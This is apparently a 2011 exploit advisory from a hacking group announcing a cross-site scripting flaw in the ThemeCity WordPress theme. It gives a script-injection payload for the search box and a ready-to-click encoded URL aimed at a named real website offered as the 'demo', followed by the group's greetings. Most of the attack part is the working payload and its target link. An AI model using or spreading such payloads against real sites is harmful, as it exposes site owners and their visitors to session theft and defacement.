WordPress ThemeCity suffers from a cross site scripting vulnerability.
480a0862d20875300617c3117d32f28a213fe2b504fccb44353af5cad6b61d1c
# Exploit Title: WP ThemeCity XSS
# Date: 21.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Demo : http://www.steveledwards.com/
Search Box
"><script>alert("DDz Mr.PaPaRoSSe")</script>
http://www.steveledwards.com/?s=%22%3E%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&submit=Search
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
DARKCOD3R Santiq0 53rh4t PerS 3spi0n syntaX
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>